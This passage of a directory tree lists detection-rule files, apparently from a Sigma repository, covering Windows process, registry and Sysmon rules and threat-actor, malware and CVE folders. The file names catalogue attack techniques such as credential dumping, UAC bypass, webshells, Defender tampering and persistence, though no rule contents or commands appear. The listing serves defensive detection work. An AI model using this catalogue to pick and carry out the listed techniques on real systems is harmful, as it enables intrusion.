proc_creation_win_taskmgr_susp_child_process.yml │ │ ├── proc_creation_win_teams_suspicious_command_line_cred_access.yml │ │ ├── proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml │ │ ├── proc_creation_win_tscon_localsystem.yml │ │ ├── proc_creation_win_tscon_rdp_redirect.yml │ │ ├── proc_creation_win_tscon_rdp_session_hijacking.yml │ │ ├── proc_creation_win_uac_bypass_changepk_slui.yml │ │ ├── proc_creation_win_uac_bypass_cleanmgr.yml │ │ ├── proc_creation_win_uac_bypass_cmstp.yml │ │ ├── proc_creation_win_uac_bypass_cmstp_com_object_access.yml │ │ ├── proc_creation_win_uac_bypass_computerdefaults.yml │ │ ├── proc_creation_win_uac_bypass_consent_comctl32.yml │ │ ├── proc_creation_win_uac_bypass_dismhost.yml │ │ ├── proc_creation_win_uac_bypass_eventvwr_recentviews.yml │ │ ├── proc_creation_win_uac_bypass_fodhelper.yml │ │ ├── proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml │ │ ├── proc_creation_win_uac_bypass_icmluautil.yml │ │ ├── proc_creation_win_uac_bypass_idiagnostic_profile.yml │ │ ├── proc_creation_win_uac_bypass_ieinstal.yml │ │ ├── proc_creation_win_uac_bypass_msconfig_gui.yml │ │ ├── proc_creation_win_uac_bypass_ntfs_reparse_point.yml │ │ ├── proc_creation_win_uac_bypass_pkgmgr_dism.yml │ │ ├── proc_creation_win_uac_bypass_sdclt.yml │ │ ├── proc_creation_win_uac_bypass_trustedpath.yml │ │ ├── proc_creation_win_uac_bypass_winsat.yml │ │ ├── proc_creation_win_uac_bypass_wmp.yml │ │ ├── proc_creation_win_uac_bypass_wsreset.yml │ │ ├── proc_creation_win_uac_bypass_wsreset_integrity_level.yml │ │ ├── proc_creation_win_ultravnc.yml │ │ ├── proc_creation_win_ultravnc_susp_execution.yml │ │ ├── proc_creation_win_uninstall_crowdstrike_falcon.yml │ │ ├── proc_creation_win_user_shell_folders_registry_modification.yml │ │ ├── proc_creation_win_userinit_uncommon_child_processes.yml │ │ ├── proc_creation_win_vaultcmd_list_creds.yml │ │ ├── proc_creation_win_vbscript_registry_modification.yml │ │ ├── proc_creation_win_verclsid_runs_com.yml │ │ ├── 
proc_creation_win_virtualbox_execution.yml │ │ ├── proc_creation_win_virtualbox_vboxdrvinst_execution.yml │ │ ├── proc_creation_win_vmware_toolbox_cmd_persistence.yml │ │ ├── proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml │ │ ├── proc_creation_win_vmware_vmtoolsd_susp_child_process.yml │ │ ├── proc_creation_win_vscode_child_processes_anomalies.yml │ │ ├── proc_creation_win_vscode_tunnel_execution.yml │ │ ├── proc_creation_win_vscode_tunnel_remote_shell_.yml │ │ ├── proc_creation_win_vscode_tunnel_renamed_execution.yml │ │ ├── proc_creation_win_vscode_tunnel_service_install.yml │ │ ├── proc_creation_win_vsdiagnostics_execution_proxy.yml │ │ ├── proc_creation_win_vshadow_exec.yml │ │ ├── proc_creation_win_vslsagent_agentextensionpath_load.yml │ │ ├── proc_creation_win_vulnerable_driver_blocklist_registry_tampering.yml │ │ ├── proc_creation_win_w32tm.yml │ │ ├── proc_creation_win_wab_execution_from_non_default_location.yml │ │ ├── proc_creation_win_wab_unusual_parents.yml │ │ ├── proc_creation_win_wbadmin_delete_all_backups.yml │ │ ├── proc_creation_win_wbadmin_delete_backups.yml │ │ ├── proc_creation_win_wbadmin_dump_sensitive_files.yml │ │ ├── proc_creation_win_wbadmin_restore_file.yml │ │ ├── proc_creation_win_wbadmin_restore_sensitive_files.yml │ │ ├── proc_creation_win_webdav_lnk_execution.yml │ │ ├── proc_creation_win_webshell_chopper.yml │ │ ├── proc_creation_win_webshell_hacking.yml │ │ ├── proc_creation_win_webshell_recon_commands_and_processes.yml │ │ ├── proc_creation_win_webshell_susp_process_spawned_from_webserver.yml │ │ ├── proc_creation_win_webshell_tool_recon.yml │ │ ├── proc_creation_win_werfault_lsass_shtinkering.yml │ │ ├── proc_creation_win_werfault_reflect_debugger_exec.yml │ │ ├── proc_creation_win_werfaultsecure_abuse.yml │ │ ├── proc_creation_win_wermgr_susp_child_process.yml │ │ ├── proc_creation_win_wermgr_susp_exec_location.yml │ │ ├── proc_creation_win_wget_download_direct_ip.yml │ │ ├── 
proc_creation_win_wget_download_susp_file_sharing_domains.yml │ │ ├── proc_creation_win_wget_download_susp_locations.yml │ │ ├── proc_creation_win_where_browser_data_recon.yml │ │ ├── proc_creation_win_whoami_all_execution.yml │ │ ├── proc_creation_win_whoami_execution_from_high_priv_process.yml │ │ ├── proc_creation_win_whoami_groups_discovery.yml │ │ ├── proc_creation_win_whoami_output.yml │ │ ├── proc_creation_win_whoami_parent_anomaly.yml │ │ ├── proc_creation_win_whoami_priv_discovery.yml │ │ ├── proc_creation_win_windows_terminal_susp_children.yml │ │ ├── proc_creation_win_winget_add_custom_source.yml │ │ ├── proc_creation_win_winget_add_insecure_custom_source.yml │ │ ├── proc_creation_win_winget_add_susp_custom_source.yml │ │ ├── proc_creation_win_winget_local_install_via_manifest.yml │ │ ├── proc_creation_win_winrar_exfil_dmp_files.yml │ │ ├── proc_creation_win_winrar_susp_child_process.yml │ │ ├── proc_creation_win_winrar_uncommon_folder_execution.yml │ │ ├── proc_creation_win_winrm_awl_bypass.yml │ │ ├── proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml │ │ ├── proc_creation_win_winrm_remote_powershell_session_process.yml │ │ ├── proc_creation_win_winrm_susp_child_process.yml │ │ ├── proc_creation_win_winrs_local_command_execution.yml │ │ ├── proc_creation_win_winrshost_command_execution.yml │ │ ├── proc_creation_win_winzip_password_compression.yml │ │ ├── proc_creation_win_wlrmdr_uncommon_child_process.yml │ │ ├── proc_creation_win_wmi_backdoor_exchange_transport_agent.yml │ │ ├── proc_creation_win_wmi_password_never_expire.yml │ │ ├── proc_creation_win_wmi_persistence_script_event_consumer.yml │ │ ├── proc_creation_win_wmic_eventconsumer_creation.yml │ │ ├── proc_creation_win_wmic_namespace_defender.yml │ │ ├── proc_creation_win_wmic_process_creation.yml │ │ ├── proc_creation_win_wmic_recon_computersystem.yml │ │ ├── proc_creation_win_wmic_recon_csproduct.yml │ │ ├── proc_creation_win_wmic_recon_group.yml │ │ ├── 
proc_creation_win_wmic_recon_hotfix.yml │ │ ├── proc_creation_win_wmic_recon_process.yml │ │ ├── proc_creation_win_wmic_recon_product.yml │ │ ├── proc_creation_win_wmic_recon_product_class.yml │ │ ├── proc_creation_win_wmic_recon_service.yml │ │ ├── proc_creation_win_wmic_recon_system_info_uncommon.yml │ │ ├── proc_creation_win_wmic_recon_unquoted_service_search.yml │ │ ├── proc_creation_win_wmic_recon_volume.yml │ │ ├── proc_creation_win_wmic_remote_execution.yml │ │ ├── proc_creation_win_wmic_service_manipulation.yml │ │ ├── proc_creation_win_wmic_squiblytwo_bypass.yml │ │ ├── proc_creation_win_wmic_stdregprov_reg_modification.yml │ │ ├── proc_creation_win_wmic_susp_execution_via_office_process.yml │ │ ├── proc_creation_win_wmic_susp_process_creation.yml │ │ ├── proc_creation_win_wmic_terminate_application.yml │ │ ├── proc_creation_win_wmic_uninstall_application.yml │ │ ├── proc_creation_win_wmic_uninstall_security_products.yml │ │ ├── proc_creation_win_wmic_xsl_script_processing.yml │ │ ├── proc_creation_win_wmiprvse_spawning_process.yml │ │ ├── proc_creation_win_wmiprvse_spawns_powershell.yml │ │ ├── proc_creation_win_wmiprvse_susp_child_processes.yml │ │ ├── proc_creation_win_wpbbin_potential_persistence.yml │ │ ├── proc_creation_win_wscript_cscript_dropper.yml │ │ ├── proc_creation_win_wscript_cscript_susp_child_processes.yml │ │ ├── proc_creation_win_wscript_cscript_uncommon_extension_exec.yml │ │ ├── proc_creation_win_wsl_child_processes_anomalies.yml │ │ ├── proc_creation_win_wsl_kali_linux_installation.yml │ │ ├── proc_creation_win_wsl_kali_linux_usage.yml │ │ ├── proc_creation_win_wsl_windows_binaries_execution.yml │ │ ├── proc_creation_win_wuauclt_dll_loading.yml │ │ ├── proc_creation_win_wuauclt_no_cli_flags_execution.yml │ │ ├── proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml │ │ ├── proc_creation_win_wusa_susp_parent_execution.yml │ │ ├── proc_creation_win_xwizard_execution_non_default_location.yml │ │ └── 
proc_creation_win_xwizard_runwizard_com_object_exec.yml │ ├── process_tampering/ │ │ └── proc_tampering_susp_process_hollowing.yml │ ├── raw_access_thread/ │ │ └── raw_access_thread_susp_disk_access_using_uncommon_tools.yml │ ├── registry/ │ │ ├── registry_add/ │ │ │ └── registry_add_persistence_disk_cleanup_handler_entry.yml │ │ ├── registry_delete/ │ │ │ ├── registry_delete_defender_context_menu.yml │ │ │ ├── registry_delete_disable_credential_guard.yml │ │ │ ├── registry_delete_enable_windows_recall.yml │ │ │ ├── registry_delete_exploit_guard_protected_folders.yml │ │ │ ├── registry_delete_mstsc_history_cleared.yml │ │ │ ├── registry_delete_removal_amsi_registry_key.yml │ │ │ ├── registry_delete_removal_com_hijacking_registry_key.yml │ │ │ ├── registry_delete_runmru.yml │ │ │ ├── registry_delete_schtasks_hide_task_via_index_value_removal.yml │ │ │ └── registry_delete_schtasks_hide_task_via_sd_value_removal.yml │ │ ├── registry_event/ │ │ │ ├── registry_event_add_local_hidden_user.yml │ │ │ ├── registry_event_bypass_via_wsreset.yml │ │ │ ├── registry_event_cmstp_execution_by_registry.yml │ │ │ ├── registry_event_defender_threat_action_modified.yml │ │ │ ├── registry_event_disable_security_events_logging_adding_reg_key_minint.yml │ │ │ ├── registry_event_disable_wdigest_credential_guard.yml │ │ │ ├── registry_event_esentutl_volume_shadow_copy_service_keys.yml │ │ │ ├── registry_event_hack_wce_reg.yml │ │ │ ├── registry_event_hybridconnectionmgr_svc_installation.yml │ │ │ ├── registry_event_mal_azorult.yml │ │ │ ├── registry_event_malware_qakbot_registry.yml │ │ │ ├── registry_event_modify_screensaver_binary_path.yml │ │ │ ├── registry_event_narrator_feedback_persistance.yml │ │ │ ├── registry_event_net_ntlm_downgrade.yml │ │ │ ├── registry_event_new_dll_added_to_appcertdlls_registry_key.yml │ │ │ ├── registry_event_new_dll_added_to_appinit_dlls_registry_key.yml │ │ │ ├── registry_event_office_test_regadd.yml │ │ │ ├── 
registry_event_office_trust_record_modification.yml │ │ │ ├── registry_event_persistence_recycle_bin.yml │ │ │ ├── registry_event_portproxy_registry_key.yml │ │ │ ├── registry_event_redmimicry_winnti_reg.yml │ │ │ ├── registry_event_runkey_winekey.yml │ │ │ ├── registry_event_runonce_persistence.yml │ │ │ ├── registry_event_shell_open_keys_manipulation.yml │ │ │ ├── registry_event_silentprocessexit_lsass.yml │ │ │ ├── registry_event_ssp_added_lsa_config.yml │ │ │ ├── registry_event_stickykey_like_backdoor.yml │ │ │ ├── registry_event_susp_atbroker_change.yml │ │ │ ├── registry_event_susp_download_run_key.yml │ │ │ ├── registry_event_susp_lsass_dll_load.yml │ │ │ ├── registry_event_susp_mic_cam_access.yml │ │ │ ├── registry_event_susp_process_registry_modification.yml │ │ │ └── registry_set_enable_anonymous_connection.yml │ │ └── registry_set/ │ │ ├── registry_set_add_load_service_in_safe_mode.yml │ │ ├── registry_set_add_port_monitor.yml │ │ ├── registry_set_aedebug_persistence.yml │ │ ├── registry_set_allow_rdp_remote_assistance_feature.yml │ │ ├── registry_set_amsi_com_hijack.yml │ │ ├── registry_set_amsi_disable.yml │ │ ├── registry_set_asep_reg_keys_modification_classes.yml │ │ ├── registry_set_asep_reg_keys_modification_common.yml │ │ ├── registry_set_asep_reg_keys_modification_currentcontrolset.yml │ │ ├── registry_set_asep_reg_keys_modification_currentversion.yml │ │ ├── registry_set_asep_reg_keys_modification_currentversion_nt.yml │ │ ├── registry_set_asep_reg_keys_modification_internet_explorer.yml │ │ ├── registry_set_asep_reg_keys_modification_office.yml │ │ ├── registry_set_asep_reg_keys_modification_session_manager.yml │ │ ├── registry_set_asep_reg_keys_modification_system_scripts.yml │ │ ├── registry_set_asep_reg_keys_modification_winsock2.yml │ │ ├── registry_set_asep_reg_keys_modification_wow6432node.yml │ │ ├── registry_set_asep_reg_keys_modification_wow6432node_classes.yml │ │ ├── 
registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml │ │ ├── registry_set_bginfo_custom_db.yml │ │ ├── registry_set_bginfo_custom_vbscript.yml │ │ ├── registry_set_bginfo_custom_wmi_query.yml │ │ ├── registry_set_bypass_uac_using_delegateexecute.yml │ │ ├── registry_set_bypass_uac_using_eventviewer.yml │ │ ├── registry_set_bypass_uac_using_silentcleanup_task.yml │ │ ├── registry_set_change_rdp_port.yml │ │ ├── registry_set_change_security_zones.yml │ │ ├── registry_set_change_sysmon_driver_altitude.yml │ │ ├── registry_set_change_winevt_channelaccess.yml │ │ ├── registry_set_chrome_extension.yml │ │ ├── registry_set_clickonce_trust_prompt.yml │ │ ├── registry_set_cobaltstrike_service_installs.yml │ │ ├── registry_set_comhijack_sdclt.yml │ │ ├── registry_set_crashdump_disabled.yml │ │ ├── registry_set_create_minint_key.yml │ │ ├── registry_set_creation_service_susp_folder.yml │ │ ├── registry_set_credential_guard_disabled.yml │ │ ├── registry_set_custom_file_open_handler_powershell_execution.yml │ │ ├── registry_set_dbgmanageddebugger_persistence.yml │ │ ├── registry_set_defender_exclusions.yml │ │ ├── registry_set_desktop_background_change.yml │ │ ├── registry_set_devdrv_disallow_antivirus_filter.yml │ │ ├── registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml │ │ ├── registry_set_deviceguard_hypervisorenforcedpagingtranslation_disabled.yml │ │ ├── registry_set_dhcp_calloutdll.yml │ │ ├── registry_set_disable_administrative_share.yml │ │ ├── registry_set_disable_autologger_sessions.yml │ │ ├── registry_set_disable_defender_firewall.yml │ │ ├── registry_set_disable_function_user.yml │ │ ├── registry_set_disable_macroruntimescanscope.yml │ │ ├── registry_set_disable_privacy_settings_experience.yml │ │ ├── registry_set_disable_security_center_notifications.yml │ │ ├── registry_set_disable_system_restore.yml │ │ ├── registry_set_disable_windows_defender_service.yml │ │ ├── registry_set_disable_windows_event_log_access.yml │ │ ├── 
registry_set_disable_windows_firewall.yml │ │ ├── registry_set_disable_winevt_logging.yml │ │ ├── registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml │ │ ├── registry_set_disabled_microsoft_defender_eventlog.yml │ │ ├── registry_set_disabled_pua_protection_on_microsoft_defender.yml │ │ ├── registry_set_disabled_tamper_protection_on_microsoft_defender.yml │ │ ├── registry_set_disallowrun_execution.yml │ │ ├── registry_set_disk_cleanup_handler_autorun_persistence.yml │ │ ├── registry_set_dns_over_https_enabled.yml │ │ ├── registry_set_dns_server_level_plugin_dll.yml │ │ ├── registry_set_dot_net_etw_tamper.yml │ │ ├── registry_set_dsrm_tampering.yml │ │ ├── registry_set_enable_periodic_backup.yml │ │ ├── registry_set_enable_windows_recall.yml │ │ ├── registry_set_enabling_cor_profiler_env_variables.yml │ │ ├── registry_set_enabling_turnoffcheck.yml │ │ ├── registry_set_evtx_file_key_tamper.yml │ │ ├── registry_set_exploit_guard_susp_allowed_apps.yml │ │ ├── registry_set_fax_change_service_user.yml │ │ ├── registry_set_fax_dll_persistance.yml │ │ ├── registry_set_file_association_exefile.yml │ │ ├── registry_set_filefix_typedpath_commands.yml │ │ ├── registry_set_hangs_debugger_persistence.yml │ │ ├── registry_set_hhctrl_persistence.yml │ │ ├── registry_set_hidden_extention.yml │ │ ├── registry_set_hide_file.yml │ │ ├── registry_set_hide_function_user.yml │ │ ├── registry_set_hide_scheduled_task_via_index_tamper.yml │ │ ├── registry_set_hvci_disallowed_images.yml │ │ ├── registry_set_ie_security_zone_protocol_defaults_downgrade.yml │ │ ├── registry_set_ime_non_default_extension.yml │ │ ├── registry_set_ime_suspicious_paths.yml │ │ ├── registry_set_install_root_or_ca_certificat.yml │ │ ├── registry_set_internet_explorer_disable_first_run_customize.yml │ │ ├── registry_set_legalnotice_susp_message.yml │ │ ├── registry_set_lolbin_onedrivestandaloneupdater.yml │ │ ├── registry_set_lsa_disablerestrictedadmin.yml │ │ ├── 
registry_set_lsass_usermode_dumping.yml │ │ ├── registry_set_net_cli_ngenassemblyusagelog.yml │ │ ├── registry_set_netsh_help_dll_persistence_susp_location.yml │ │ ├── registry_set_netsh_helper_dll_potential_persistence.yml │ │ ├── registry_set_new_application_appcompat.yml │ │ ├── registry_set_new_network_provider.yml │ │ ├── registry_set_odbc_driver_registered.yml │ │ ├── registry_set_odbc_driver_registered_susp.yml │ │ ├── registry_set_office_access_vbom_tamper.yml │ │ ├── registry_set_office_disable_protected_view_features.yml │ │ ├── registry_set_office_disable_python_security_warnings.yml │ │ ├── registry_set_office_enable_dde.yml │ │ ├── registry_set_office_outlook_enable_load_macro_provider_on_boot.yml │ │ ├── registry_set_office_outlook_enable_macro_execution.yml │ │ ├── registry_set_office_outlook_enable_unsafe_client_mail_rules.yml │ │ ├── registry_set_office_outlook_security_settings.yml │ │ ├── registry_set_office_trust_record_susp_location.yml │ │ ├── registry_set_office_trusted_location_uncommon.yml │ │ ├── registry_set_office_vba_warnings_tamper.yml │ │ ├── registry_set_optimize_file_sharing_network.yml │ │ ├── registry_set_persistence_amsi_providers.yml │ │ ├── registry_set_persistence_app_cpmpat_layer_registerapprestart.yml │ │ ├── registry_set_persistence_app_paths.yml │ │ ├── registry_set_persistence_appx_debugger.yml │ │ ├── registry_set_persistence_autodial_dll.yml │ │ ├── registry_set_persistence_chm.yml │ │ ├── registry_set_persistence_com_hijacking_builtin.yml │ │ ├── registry_set_persistence_com_key_linking.yml │ │ ├── registry_set_persistence_comhijack_psfactorybuffer.yml │ │ ├── registry_set_persistence_custom_protocol_handler.yml │ │ ├── registry_set_persistence_event_viewer_events_asp.yml │ │ ├── registry_set_persistence_globalflags.yml │ │ ├── registry_set_persistence_ie.yml │ │ ├── registry_set_persistence_ifilter.yml │ │ ├── registry_set_persistence_logon_scripts_userinitmprlogonscript.yml │ │ ├── 
registry_set_persistence_lsa_extension.yml │ │ ├── registry_set_persistence_mpnotify.yml │ │ ├── registry_set_persistence_mycomputer.yml │ │ ├── registry_set_persistence_natural_language.yml │ │ ├── registry_set_persistence_office_vsto.yml │ │ ├── registry_set_persistence_outlook_homepage.yml │ │ ├── registry_set_persistence_outlook_todaypage.yml │ │ ├── registry_set_persistence_reflectdebugger.yml │ │ ├── registry_set_persistence_scrobj_dll.yml │ │ ├── registry_set_persistence_shim_database.yml │ │ ├── registry_set_persistence_shim_database_susp_application.yml │ │ ├── registry_set_persistence_shim_database_uncommon_location.yml │ │ ├── registry_set_persistence_typed_paths.yml │ │ ├── registry_set_persistence_xll.yml │ │ ├── registry_set_policies_associations_tamper.yml │ │ ├── registry_set_policies_attachments_tamper.yml │ │ ├── registry_set_potential_clickfix_execution.yml │ │ ├── registry_set_potential_oci_dll_redirection.yml │ │ ├── registry_set_powershell_as_service.yml │ │ ├── registry_set_powershell_enablescripts_enabled.yml │ │ ├── registry_set_powershell_execution_policy.yml │ │ ├── registry_set_powershell_in_run_keys.yml │ │ ├── registry_set_powershell_logging_disabled.yml │ │ ├── registry_set_provisioning_command_abuse.yml │ │ ├── registry_set_pua_sysinternals_execution_via_eula.yml │ │ ├── registry_set_pua_sysinternals_renamed_execution_via_eula.yml │ │ ├── registry_set_pua_sysinternals_susp_execution_via_eula.yml │ │ ├── registry_set_renamed_sysinternals_eula_accepted.yml │ │ ├── registry_set_rpcrt4_etw_tamper.yml │ │ ├── registry_set_runmru_susp_command_execution.yml │ │ ├── registry_set_scr_file_executed_by_rundll32.yml │ │ ├── registry_set_sentinelone_shell_context_tampering.yml │ │ ├── registry_set_servicedll_hijack.yml │ │ ├── registry_set_services_etw_tamper.yml │ │ ├── registry_set_set_nopolicies_user.yml │ │ ├── registry_set_sip_persistence.yml │ │ ├── registry_set_sophos_av_tamper.yml │ │ ├── registry_set_special_accounts.yml │ │ ├── 
registry_set_suppress_defender_notifications.yml │ │ ├── registry_set_susp_keyboard_layout_load.yml │ │ ├── registry_set_susp_pendingfilerenameoperations.yml │ │ ├── registry_set_susp_printer_driver.yml │ │ ├── registry_set_susp_reg_persist_explorer_run.yml │ │ ├── registry_set_susp_run_key_img_folder.yml │ │ ├── registry_set_susp_runmru_space_character.yml │ │ ├── registry_set_susp_service_installed.yml │ │ ├── registry_set_susp_shell_open_keys_modification_patterns.yml │ │ ├── registry_set_susp_typedpaths_space_characters.yml │ │ ├── registry_set_susp_user_shell_folders.yml │ │ ├── registry_set_susp_wfp_filter_added.yml │ │ ├── registry_set_suspicious_env_variables.yml │ │ ├── registry_set_system_lsa_nolmhash.yml │ │ ├── registry_set_taskcache_entry.yml │ │ ├── registry_set_telemetry_persistence.yml │ │ ├── registry_set_terminal_server_suspicious.yml │ │ ├── registry_set_terminal_server_tampering.yml │ │ ├── registry_set_timeproviders_dllname.yml │ │ ├── registry_set_tls_protocol_old_version_enabled.yml │ │ ├── registry_set_treatas_persistence.yml │ │ ├── registry_set_turn_on_dev_features.yml │ │ ├── registry_set_uac_bypass_eventvwr.yml │ │ ├── registry_set_uac_bypass_sdclt.yml │ │ ├── registry_set_uac_bypass_winsat.yml │ │ ├── registry_set_uac_bypass_wmp.yml │ │ ├── registry_set_uac_disable.yml │ │ ├── registry_set_uac_disable_notification.yml │ │ ├── registry_set_uac_disable_secure_desktop_prompt.yml │ │ ├── registry_set_vbs_payload_stored.yml │ │ ├── registry_set_vulnerable_driver_blocklist_disable.yml │ │ ├── registry_set_wab_dllpath_reg_change.yml │ │ ├── registry_set_wdigest_enable_uselogoncredential.yml │ │ ├── registry_set_windows_defender_tamper.yml │ │ ├── registry_set_winget_admin_settings_tampering.yml │ │ ├── registry_set_winget_enable_local_manifest.yml │ │ ├── registry_set_winlogon_allow_multiple_tssessions.yml │ │ └── registry_set_winlogon_notify_key.yml │ ├── sysmon/ │ │ ├── sysmon_config_modification.yml │ │ ├── 
sysmon_config_modification_error.yml │ │ ├── sysmon_config_modification_status.yml │ │ ├── sysmon_file_block_executable.yml │ │ ├── sysmon_file_block_shredding.yml │ │ └── sysmon_file_executable_detected.yml │ └── wmi_event/ │ ├── sysmon_wmi_event_subscription.yml │ ├── sysmon_wmi_susp_encoded_scripts.yml │ └── sysmon_wmi_susp_scripting.yml ├── rules-compliance/ │ ├── README.md │ ├── other/ │ │ └── netflow_cleartext_protocols.yml │ └── product/ │ └── qualys/ │ ├── qualys_default_credentials_usage.yml │ └── qualys_host_without_firewall.yml ├── rules-dfir/ │ └── README.md ├── rules-emerging-threats/ │ ├── 2010/ │ │ └── Exploits/ │ │ └── CVE-2010-5278/ │ │ └── web_cve_2010_5278_exploitation_attempt.yml │ ├── 2014/ │ │ ├── Exploits/ │ │ │ └── CVE-2014-6287/ │ │ │ └── web_cve_2014_6287_hfs_rce.yml │ │ └── TA/ │ │ ├── Axiom/ │ │ │ └── proc_creation_win_apt_zxshell.yml │ │ └── Turla/ │ │ ├── proc_creation_win_apt_turla_commands_critical.yml │ │ └── proc_creation_win_apt_turla_comrat_may20.yml │ ├── 2015/ │ │ └── Exploits/ │ │ └── CVE-2015-1641/ │ │ └── proc_creation_win_exploit_cve_2015_1641.yml │ ├── 2017/ │ │ ├── Exploits/ │ │ │ ├── CVE-2017-0261/ │ │ │ │ └── proc_creation_win_exploit_cve_2017_0261.yml │ │ │ ├── CVE-2017-11882/ │ │ │ │ └── proc_creation_win_exploit_cve_2017_11882.yml │ │ │ └── CVE-2017-8759/ │ │ │ └── proc_creation_win_exploit_cve_2017_8759.yml │ │ ├── Malware/ │ │ │ ├── Adwind-RAT/ │ │ │ │ └── proc_creation_win_malware_adwind.yml │ │ │ ├── CosmicDuke/ │ │ │ │ └── win_security_mal_cosmik_duke_persistence.yml │ │ │ ├── Fireball/ │ │ │ │ └── proc_creation_win_malware_fireball.yml │ │ │ ├── Hancitor/ │ │ │ │ └── proc_access_win_malware_verclsid_shellcode.yml │ │ │ ├── NotPetya/ │ │ │ │ └── proc_creation_win_malware_notpetya.yml │ │ │ ├── PlugX/ │ │ │ │ └── proc_creation_win_malware_plugx_susp_exe_locations.yml │ │ │ ├── StoneDrill/ │ │ │ │ └── win_system_apt_stonedrill.yml │ │ │ └── WannaCry/ │ │ │ └── proc_creation_win_malware_wannacry.yml │ │ └── TA/ │ │ 
├── APT10/ │ │ │ └── proc_creation_win_apt_apt10_cloud_hopper.yml │ │ ├── Dragonfly/ │ │ │ └── proc_creation_win_apt_ta17_293a_ps.yml │ │ ├── Equation-Group/ │ │ │ └── net_firewall_apt_equationgroup_c2.yml │ │ ├── Lazarus/ │ │ │ └── proc_creation_win_apt_lazarus_binary_masquerading.yml │ │ ├── Pandemic/ │ │ │ └── registry_event_apt_pandemic.yml │ │ └── Turla/ │ │ ├── pipe_created_apt_turla_named_pipes.yml │ │ ├── win_system_apt_carbonpaper_turla.yml │ │ └── win_system_apt_turla_service_png.yml │ ├── 2018/ │ │ ├── Exploits/ │ │ │ ├── CVE-2018-13379/ │ │ │ │ └── web_cve_2018_13379_fortinet_preauth_read_exploit.yml │ │ │ ├── CVE-2018-15473/ │ │ │ │ └── lnx_sshd_exploit_cve_2018_15473.yml │ │ │ └── CVE-2018-2894/ │ │ │ └── web_cve_2018_2894_weblogic_exploit.yml │ │ ├── Malware/ │ │ │ └── Elise-Backdoor/ │ │ │ └── proc_creation_win_malware_elise.yml │ │ └── TA/ │ │ ├── APT27/ │ │ │ └── proc_creation_win_apt_apt27_emissary_panda.yml │ │ ├── APT28/ │ │ │ └── proc_creation_win_apt_sofacy.yml │ │ ├── APT29-CozyBear/ │ │ │ ├── file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml │ │ │ └── proc_creation_win_apt_apt29_phishing_campaign_indicators.yml │ │ ├── APT32-Oceanlotus/ │ │ │ └── registry_event_apt_oceanlotus_registry.yml │ │ ├── MuddyWater/ │ │ │ └── proc_creation_win_apt_muddywater_activity.yml │ │ ├── OilRig/ │ │ │ ├── proc_creation_win_apt_oilrig_mar18.yml │ │ │ ├── registry_event_apt_oilrig_mar18.yml │ │ │ ├── win_security_apt_oilrig_mar18.yml │ │ │ └── win_system_apt_oilrig_mar18.yml │ │ ├── Slingshot/ │ │ │ ├── proc_creation_win_apt_slingshot.yml │ │ │ └── win_security_apt_slingshot.yml │ │ └── TropicTrooper/ │ │ └── proc_creation_win_apt_tropictrooper.yml │ ├── 2019/ │ │ ├── Exploits/ │ │ │ ├── BearLPE-Exploit/ │ │ │ │ └── proc_creation_win_exploit_other_bearlpe.yml │ │ │ ├── CVE-2019-0708/ │ │ │ │ ├── win_security_exploit_cve_2019_0708_scanner_poc.yml │ │ │ │ └── win_system_exploit_cve_2019_0708.yml │ │ │ ├── CVE-2019-11510/ │ │ │ │ └── 
web_cve_2019_11510_pulsesecure_exploit.yml │ │ │ ├── CVE-2019-1378/ │ │ │ │ └── proc_creation_win_exploit_cve_2019_1378.yml │ │ │ ├── CVE-2019-1388/ │ │ │ │ └── proc_creation_win_exploit_cve_2019_1388.yml │ │ │ ├── CVE-2019-14287/ │ │ │ │ ├── lnx_sudo_exploit_cve_2019_14287.yml │ │ │ │ └── proc_creation_lnx_exploit_cve_2019_14287.yml │ │ │ ├── CVE-2019-19781/ │ │ │ │ └── web_cve_2019_19781_citrix_exploit.yml │ │ │ └── CVE-2019-3398/ │ │ │ └── web_cve_2019_3398_confluence.yml │ │ ├── Malware/ │ │ │ ├── BabyShark/ │ │ │ │ └── proc_creation_win_malware_babyshark.yml │ │ │ ├── Chafer/ │ │ │ │ └── proxy_malware_chafer_url_pattern.yml │ │ │ ├── Dridex/ │ │ │ │ └── proc_creation_win_malware_dridex.yml │ │ │ ├── Dtrack-RAT/ │ │ │ │ └── proc_creation_win_malware_dtrack.yml │ │ │ ├── Emotet/ │ │ │ │ └── proc_creation_win_malware_emotet.yml │ │ │ ├── Formbook/ │ │ │ │ └── proc_creation_win_malware_formbook.yml │ │ │ ├── LockerGoga/ │ │ │ │ └── proc_creation_win_malware_lockergoga_ransomware.yml │ │ │ ├── QBot/ │ │ │ │ └── proc_creation_win_malware_qbot.yml │ │ │ ├── Ryuk/ │ │ │ │ └── proc_creation_win_malware_ryuk.yml │ │ │ ├── Snatch/ │ │ │ │ └── proc_creation_win_malware_snatch_ransomware.yml │ │ │ └── Ursnif/ │ │ │ ├── proxy_malware_ursnif_c2_url.yml │ │ │ ├── proxy_malware_ursnif_download_url.yml │ │ │ └── registry_add_malware_ursnif.yml │ │ └── TA/ │ │ ├── APC-C-12/ │ │ │ └── proc_creation_win_apt_aptc12_bluemushroom.yml │ │ ├── APT31/ │ │ │ └── proc_creation_win_apt_apt31_judgement_panda.yml │ │ ├── APT40/ │ │ │ └── proxy_apt_apt40_dropbox_tool_ua.yml │ │ ├── Bear-APT-Activity/ │ │ │ └── proc_creation_win_apt_bear_activity_gtr19.yml │ │ ├── EmpireMonkey/ │ │ │ └── proc_creation_win_apt_empiremonkey.yml │ │ ├── EquationGroup/ │ │ │ └── proc_creation_win_apt_equationgroup_dll_u_load.yml │ │ ├── MustangPanda/ │ │ │ └── proc_creation_win_apt_mustangpanda.yml │ │ └── Operation-Wocao/ │ │ ├── README.md │ │ ├── proc_creation_win_apt_wocao.yml │ │ └── win_security_apt_wocao.yml 
